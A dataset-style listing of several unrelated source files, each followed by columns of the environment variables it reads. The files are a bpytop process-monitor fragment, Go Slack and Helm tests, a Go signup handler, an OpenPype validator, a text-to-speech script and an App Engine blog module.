def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def temperature(value: int, scale: str = "celsius") -> Tuple[int, str]:
"""Returns a tuple with integer value and string unit converted from an integer in celsius to: celsius, fahrenheit, kelvin or rankine."""
if scale == "celsius":
return (value, "°C")
elif scale == "fahrenheit":
return (round(value * 1.8 + 32), "°F")
elif scale == "kelvin":
return (round(value + 273.15), "K ")
elif scale == "rankine":
return (round(value * 1.8 + 491.67), "°R")
else:
return (0, "")
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["H", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right", "h", "l"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key in ["f", "F", "/"]:
ProcBox.filtering = True
ProcCollector.case_sensitive = key == "F"
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key == "T": sig = signal.SIGTERM
elif key == "K": sig = signal.SIGKILL
elif key == "I": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "i":
Collector.collect_idle.wait()
CONFIG.io_mode = not CONFIG.io_mode
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
#Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
sys.stdin.reconfigure(errors="ignore") # type: ignore
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
| []
| []
| [
"USER",
"TERMINAL_TITLE"
]
| [] | ["USER", "TERMINAL_TITLE"] | python | 2 | 0 | |
rtm/rtm_test.go | package rtm_test
import (
"context"
"os"
"testing"
"time"
"github.com/lestrrat-go/slack"
)
var dmUser string
var isBot bool
var slackToken string
func init() {
slackToken = os.Getenv("SLACK_TOKEN")
dmUser = os.Getenv("TEST_DM_USER") // don't forget to include an "@"
if len(slackToken) > 0 {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
cl := slack.New(slackToken)
res, err := cl.Auth().Test().Do(ctx)
if err == nil {
user, err := cl.Users().Info(res.UserID).Do(ctx)
if err == nil {
isBot = user.IsBot
}
}
}
}
func requireSlackToken(t *testing.T) bool {
if slackToken == "" {
t.Skip("SLACK_TOKEN not available")
return false
}
return true
}
func requireDMUser(t *testing.T) bool {
if dmUser == "" {
t.Skip("TEST_DM_USER not available")
return false
}
return true
}
func requireRealUser(t *testing.T) bool {
if !requireSlackToken(t) {
return false
}
if isBot {
t.Skip("User authenticated by the token is a bot.")
return false
}
return true
}
| [
"\"SLACK_TOKEN\"",
"\"TEST_DM_USER\""
]
| []
| [
"TEST_DM_USER",
"SLACK_TOKEN"
]
| [] | ["TEST_DM_USER", "SLACK_TOKEN"] | go | 2 | 0 | |
unix-ffi/pwd/test_getpwnam.py | import pwd
import os
user = os.getenv("USER")
passwd = pwd.getpwnam(user)
assert passwd
assert isinstance(passwd, pwd.struct_passwd)
| []
| []
| [
"USER"
]
| [] | ["USER"] | python | 1 | 0 | |
api/internal/newuser/newuser.go | package newuser
import (
"encoding/json"
"log"
"net/http"
"os"
"github.com/flaviogf/conduit/api/internal/models"
"golang.org/x/crypto/bcrypt"
)
type NewUserRequest struct {
User NewUser `json:"user"`
}
type NewUser struct {
Username string `json:"username"`
Email string `json:"email"`
Password string `json:"password"`
}
type UserResponse struct {
User User `json:"user"`
}
type User struct {
Email string `json:"email"`
Token string `json:"token"`
Username string `json:"username"`
Bio string `json:"bio"`
Image string `json:"image"`
}
func NewUserHandler(rw http.ResponseWriter, r *http.Request) {
var body NewUserRequest
dec := json.NewDecoder(r.Body)
err := dec.Decode(&body)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusUnprocessableEntity)
return
}
passwordHash, err := bcrypt.GenerateFromPassword([]byte(body.User.Password), 8)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
return
}
ctx, err := models.Context(r.Context())
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
return
}
user := models.NewUser(0, body.User.Username, body.User.Email, string(passwordHash), "", "")
err = user.Save(ctx)
if err != nil {
log.Println(err)
rw.WriteHeader(http.StatusInternalServerError)
_ = ctx.Value("tx").(models.Tx).Rollback()
return
}
_ = ctx.Value("tx").(models.Tx).Commit()
response := UserResponse{User{
user.Email,
user.Token(os.Getenv("CONDUIT_KEY")),
user.Username,
user.Bio,
user.Image,
}}
rw.WriteHeader(http.StatusCreated)
enc := json.NewEncoder(rw)
enc.Encode(response)
}
| [
"\"CONDUIT_KEY\""
]
| []
| [
"CONDUIT_KEY"
]
| [] | ["CONDUIT_KEY"] | go | 1 | 0 | |
openpype/hosts/harmony/plugins/publish/validate_scene_settings.py | # -*- coding: utf-8 -*-
"""Validate scene settings."""
import os
import json
import re
import pyblish.api
from avalon import harmony
import openpype.hosts.harmony
class ValidateSceneSettingsRepair(pyblish.api.Action):
"""Repair the instance."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
"""Repair action entry point."""
expected = openpype.hosts.harmony.api.get_asset_settings()
asset_settings = _update_frames(dict.copy(expected))
asset_settings["frameStart"] = 1
asset_settings["frameEnd"] = asset_settings["frameEnd"] + \
asset_settings["handleEnd"]
openpype.hosts.harmony.api.set_scene_settings(asset_settings)
if not os.path.exists(context.data["scenePath"]):
self.log.info("correcting scene name")
scene_dir = os.path.dirname(context.data["currentFile"])
scene_path = os.path.join(
scene_dir, os.path.basename(scene_dir) + ".xstage"
)
harmony.save_scene_as(scene_path)
class ValidateSceneSettings(pyblish.api.InstancePlugin):
"""Ensure the scene settings are in sync with database."""
order = pyblish.api.ValidatorOrder
label = "Validate Scene Settings"
families = ["workfile"]
hosts = ["harmony"]
actions = [ValidateSceneSettingsRepair]
optional = True
# skip frameEnd check if asset contains any of:
frame_check_filter = ["_ch_", "_pr_", "_intd_", "_extd_"] # regex
# skip resolution check if Task name matches any of regex patterns
skip_resolution_check = ["render", "Render"] # regex
# skip frameStart, frameEnd check if Task name matches any of regex patt.
skip_timelines_check = [] # regex
def process(self, instance):
"""Plugin entry point."""
expected_settings = openpype.hosts.harmony.api.get_asset_settings()
self.log.info("scene settings from DB:".format(expected_settings))
expected_settings = _update_frames(dict.copy(expected_settings))
expected_settings["frameEndHandle"] = expected_settings["frameEnd"] +\
expected_settings["handleEnd"]
if (any(re.search(pattern, os.getenv('AVALON_TASK'))
for pattern in self.skip_resolution_check)):
expected_settings.pop("resolutionWidth")
expected_settings.pop("resolutionHeight")
entity_type = expected_settings.get("entityType")
if (any(re.search(pattern, entity_type)
for pattern in self.skip_timelines_check)):
expected_settings.pop('frameStart', None)
expected_settings.pop('frameEnd', None)
expected_settings.pop("entityType") # not useful after the check
asset_name = instance.context.data['anatomyData']['asset']
if any(re.search(pattern, asset_name)
for pattern in self.frame_check_filter):
expected_settings.pop("frameEnd")
# handle case where ftrack uses only two decimal places
# 23.976023976023978 vs. 23.98
fps = instance.context.data.get("frameRate")
if isinstance(instance.context.data.get("frameRate"), float):
fps = float(
"{:.2f}".format(instance.context.data.get("frameRate")))
self.log.debug("filtered settings: {}".format(expected_settings))
current_settings = {
"fps": fps,
"frameStart": instance.context.data["frameStart"],
"frameEnd": instance.context.data["frameEnd"],
"handleStart": instance.context.data.get("handleStart"),
"handleEnd": instance.context.data.get("handleEnd"),
"frameEndHandle": instance.context.data.get("frameEndHandle"),
"resolutionWidth": instance.context.data.get("resolutionWidth"),
"resolutionHeight": instance.context.data.get("resolutionHeight"),
}
self.log.debug("current scene settings {}".format(current_settings))
invalid_settings = []
for key, value in expected_settings.items():
if value != current_settings[key]:
invalid_settings.append({
"name": key,
"expected": value,
"current": current_settings[key]
})
if ((expected_settings["handleStart"]
or expected_settings["handleEnd"])
and invalid_settings):
msg = "Handles included in calculation. Remove handles in DB " +\
"or extend frame range in timeline."
invalid_settings[-1]["reason"] = msg
msg = "Found invalid settings:\n{}".format(
json.dumps(invalid_settings, sort_keys=True, indent=4)
)
assert not invalid_settings, msg
assert os.path.exists(instance.context.data.get("scenePath")), (
"Scene file not found (saved under wrong name)"
)
def _update_frames(expected_settings):
"""
Calculate proper frame range including handles set in DB.
Harmony requires rendering from 1, so frame range is always moved
to 1.
Args:
expected_settings (dict): pulled from DB
Returns:
modified expected_setting (dict)
"""
frames_count = expected_settings["frameEnd"] - \
expected_settings["frameStart"] + 1
expected_settings["frameStart"] = 1.0 + expected_settings["handleStart"]
expected_settings["frameEnd"] = \
expected_settings["frameStart"] + frames_count - 1
return expected_settings
| []
| []
| [
"AVALON_TASK"
]
| [] | ["AVALON_TASK"] | python | 1 | 0 | |
pkg/postrender/exec_test.go | /*
Copyright The Helm Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package postrender
import (
"bytes"
"io/ioutil"
"os"
"path/filepath"
"runtime"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/hinfinite/helm/internal/test/ensure"
)
const testingScript = `#!/bin/sh
sed s/FOOTEST/BARTEST/g <&0
`
func TestGetFullPath(t *testing.T) {
is := assert.New(t)
t.Run("full path resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
fullPath, err := getFullPath(testpath)
is.NoError(err)
is.Equal(testpath, fullPath)
})
t.Run("relative path resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
currentDir, err := os.Getwd()
require.NoError(t, err)
relative, err := filepath.Rel(currentDir, testpath)
require.NoError(t, err)
fullPath, err := getFullPath(relative)
is.NoError(err)
is.Equal(testpath, fullPath)
})
t.Run("binary in PATH resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
realPath := os.Getenv("PATH")
os.Setenv("PATH", filepath.Dir(testpath))
defer func() {
os.Setenv("PATH", realPath)
}()
fullPath, err := getFullPath(filepath.Base(testpath))
is.NoError(err)
is.Equal(testpath, fullPath)
})
// NOTE(thomastaylor312): See note in getFullPath for more details why this
// is here
// t.Run("binary in plugin path resolves correctly", func(t *testing.T) {
// testpath, cleanup := setupTestingScript(t)
// defer cleanup()
// realPath := os.Getenv("HELM_PLUGINS")
// os.Setenv("HELM_PLUGINS", filepath.Dir(testpath))
// defer func() {
// os.Setenv("HELM_PLUGINS", realPath)
// }()
// fullPath, err := getFullPath(filepath.Base(testpath))
// is.NoError(err)
// is.Equal(testpath, fullPath)
// })
// t.Run("binary in multiple plugin paths resolves correctly", func(t *testing.T) {
// testpath, cleanup := setupTestingScript(t)
// defer cleanup()
// realPath := os.Getenv("HELM_PLUGINS")
// os.Setenv("HELM_PLUGINS", filepath.Dir(testpath)+string(os.PathListSeparator)+"/another/dir")
// defer func() {
// os.Setenv("HELM_PLUGINS", realPath)
// }()
// fullPath, err := getFullPath(filepath.Base(testpath))
// is.NoError(err)
// is.Equal(testpath, fullPath)
// })
}
func TestExecRun(t *testing.T) {
if runtime.GOOS == "windows" {
// the actual Run test uses a basic sed example, so skip this test on windows
t.Skip("skipping on windows")
}
is := assert.New(t)
testpath, cleanup := setupTestingScript(t)
defer cleanup()
renderer, err := NewExec(testpath)
require.NoError(t, err)
output, err := renderer.Run(bytes.NewBufferString("FOOTEST"))
is.NoError(err)
is.Contains(output.String(), "BARTEST")
}
func setupTestingScript(t *testing.T) (filepath string, cleanup func()) {
t.Helper()
tempdir := ensure.TempDir(t)
f, err := ioutil.TempFile(tempdir, "post-render-test.sh")
if err != nil {
t.Fatalf("unable to create tempfile for testing: %s", err)
}
_, err = f.WriteString(testingScript)
if err != nil {
t.Fatalf("unable to write tempfile for testing: %s", err)
}
err = f.Chmod(0755)
if err != nil {
t.Fatalf("unable to make tempfile executable for testing: %s", err)
}
err = f.Close()
if err != nil {
t.Fatalf("unable to close tempfile after writing: %s", err)
}
return f.Name(), func() {
os.RemoveAll(tempdir)
}
}
| [
"\"PATH\"",
"\"HELM_PLUGINS\"",
"\"HELM_PLUGINS\""
]
| []
| [
"HELM_PLUGINS",
"PATH"
]
| [] | ["HELM_PLUGINS", "PATH"] | go | 2 | 0 | |
app.py | import openpyxl as xl
from google.cloud import texttospeech_v1 as tts
import os
wb = xl.load_workbook("input.xlsx")
ws = wb["Sheet1"]
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "key.json"
client = tts.TextToSpeechClient()
voice = tts.VoiceSelectionParams(language_code="en-US", name="en-US-Wavenet-D")
audio_config = tts.AudioConfig(audio_encoding=tts.AudioEncoding.LINEAR16)
file_count = 0
for row in range(2, ws.max_row + 1):
text = ws.cell(row, 1).value
filename = ws.cell(row, 2).value
if isinstance(filename, str) == False:
filename = str(filename)
elif filename == None:
filename = "_PLACEHOLDER"
input_text = tts.SynthesisInput(text=text)
response = client.synthesize_speech(
request={"input": input_text, "voice": voice, "audio_config": audio_config}
)
with open(filename + ".wav", "wb") as out:
out.write(response.audio_content)
file_count += 1
print(f"{file_count} audio file(s) have been successfully generated!")
| []
| []
| [
"GOOGLE_APPLICATION_CREDENTIALS"
]
| [] | ["GOOGLE_APPLICATION_CREDENTIALS"] | python | 1 | 0 | |
blog.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2008 N23 <[email protected]>
# All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Id$
import sys
import os
import datetime
import urllib2
import wsgiref.handlers
import re
sys.path.append('modules')
from modules.base import *
from modules.models import *
from modules import PyRSS2Gen
from modules.theme import Theme, ThemeIterator
from modules.config import Config
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
from mimetypes import types_map
class NewPost(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "new"
self.template_values.update({
'mode': 'new',
})
self.render(self.theme.editpost_page)
def post(self):
if self.chk_admin():
title = self.param('title')
content = self.param('post_content')
tags = split_tags(self.param('tags'))
try:
postid = new_post(title = title, author = self.login_user,
content = content, tags = tags)
self.redirect('/blog/post/%d' % postid)
except db.BadValueError, e:
self.redirect('/blog/')
class NewComment(BaseRequestHandler):
def post(self):
if self.chk_login():
content = self.param('comment_content')
postid = self.param('postid')
nick = self.param('nick')
site = self.param('site')
post = Post.get_by_id(int(postid))
try:
comment = Comment(post = post,
content = content,
author = self.login_user)
comment.put()
change_user_info(self.login_user, nick, site)
self.redirect('/blog/post/%s' % postid)
except db.BadValueError, e:
self.redirect('/blog/')
class EditPost(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "new"
#postid = self.request.path[15:]
postid = postIdPattern.findall(self.request.path)[0]
post = Post.get_by_id(int(postid))
self.template_values.update({
'post': post,
'mode': 'edit',
})
self.render(self.theme.editpost_page)
def post(self):
if self.chk_admin():
#postid = self.request.path[15:]
postid = postIdPattern.findall(self.request.path)[0]
edit_post(postid = postid,
title = self.param('title'),
content = self.param('post_content'),
tags = split_tags(self.param('tags')))
self.redirect('/blog/post/%s' % postid)
class EditComment(BaseRequestHandler):
def get(self):
# TODO
self.redirect('/blog/')
def post(self):
# TODO
self.redirect('/blog/')
class DeletePost(BaseRequestHandler):
def get(self):
if self.chk_admin():
postid = self.param('postid')
delete_post(postid)
self.redirect('/blog/')
class DeleteComment(BaseRequestHandler):
def get(self):
if self.chk_login():
commentid = self.param('commentid')
comment = Comment.get_by_id(int(commentid))
if self.login_user == comment.author or self.is_admin:
postid = comment.post.key().id()
comment.delete()
self.redirect('/blog/post/%d' % postid)
else:
self.redirect('/blog/')
class PostList(BaseRequestHandler):
def get(self):
self.current_page = "home"
tag_pattern = re.compile('^/blog/tag/(.*)')
tag_list = tag_pattern.findall(self.request.path)
tag = ''
if tag_list:
tag = tag_list[0]
if tag.find('/') != -1:
tag = tag[:tag.find('/')]
tag = urllib2.unquote(urllib2.unquote(tag)).decode('utf-8')
all_posts = Post.all().filter('tags =', tag)
else:
all_posts = Post.all()
page_size = config.posts_per_page
max_page = (all_posts.count() + page_size - 1) / page_size
page = 1
page_pattern = re.compile('/page/(\d+)$')
pattern_list = page_pattern.findall(self.request.path)
if pattern_list:
page = int(pattern_list[0])
if page > max_page:
page = max_page
if page <= 0:
page = 1
offset = (page - 1) * page_size
posts = all_posts.order('-date').fetch(page_size, offset = offset)
show_prev = False
show_next = False
show_prev = not (page == 1)
show_next = not (page == max_page)
page_list = []
cnt = 1
while cnt < max_page:
page_list.append(cnt)
cnt += 1
self.template_values.update({
'tag': tag,
'posts': posts,
'post_count': all_posts.count(),
'show_prev': show_prev,
'show_next': show_next,
'prev': page - 1,
'next': page + 1,
'page': page,
'max_page': max_page,
'page_list': page_list,
})
self.render(self.theme.postlist_page)
class ViewPost(BaseRequestHandler):
def get(self):
self.current_page = "home"
#postid = self.request.path[11:]
postid = postIdPattern.findall(self.request.path)[0]
post = Post.get_by_id(int(postid))
comments = Comment.all().filter('post = ', post).order('date')
if not post:
self.redirect('/static/pages/404.html')
else:
self.template_values.update({
'post': post,
'comments': comments,
})
self.render(self.theme.viewpost_page)
class Customize(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "config"
# put the class definition here to avoid caching,
# because we need it list theme dir every time
class ConfigForm(djangoforms.ModelForm):
theme = djangoforms.forms.CharField(
widget = djangoforms.forms.Select(choices = ThemeIterator()))
class Meta:
model = config
exclude = ('last_config_time')
config_form = ConfigForm(instance = config)
self.template_values.update({
'config_form': config_form,
})
self.render(self.theme.config_page)
def post(self):
if self.chk_admin():
# put the class definition here to avoid caching,
# because we need it list theme dir every time
class ConfigForm(djangoforms.ModelForm):
theme = djangoforms.forms.CharField(
widget = djangoforms.forms.Select(choices = ThemeIterator()))
class Meta:
model = Config
exclude = ('last_config_time')
config_form = ConfigForm(data = self.request.POST,
instance = config)
if config_form.is_valid():
config_form.save(commit=False)
config.last_config_time = \
datetime.datetime.utcnow().replace(microsecond=0)
config.put()
global_vars['theme'] = Theme(config.theme)
self.redirect('/blog/')
else:
self.template_values.update({
'config_form': config_form,
})
self.render(self.theme.config_page)
class RssFead(BaseRequestHandler):
def get(self):
blog_items = []
feed_title = config.blog_title
if self.request.path.startswith('/blog/feed/tag/'):
# here too, i need unquote twice -_-
tag = urllib2.unquote(urllib2.unquote(
self.request.path[15:])).decode('utf-8')
feed_title += 'Tag: ' + tag
posts = Post.all().filter('tags = ',
tag).order('-date').fetch(config.rss_posts)
elif self.request.path.startswith('/blog/feed'):
posts = Post.all().order('-date').fetch(config.rss_posts)
for post in posts:
post_url = '%s/blog/post/%d' % (self.request.host_url,
post.key().id())
blog_items.append(PyRSS2Gen.RSSItem(
title = post.title,
author = post.author.nickname(),
link = post_url,
description = post.content,
pubDate = post.date,
guid = PyRSS2Gen.Guid(post_url),
categories = post.tags))
rss = PyRSS2Gen.RSS2(
title = config.blog_title,
link = self.request.host_url + '/blog/',
description = 'latest %d posts of %s' % (min(len(blog_items),
config.rss_posts),
config.blog_title),
lastBuildDate = datetime.datetime.utcnow(),
items = blog_items)
self.response.headers['Content-Type'] = \
'application/rss+xml; charset=utf-8'
self.write(rss.to_xml(encoding='utf-8'))
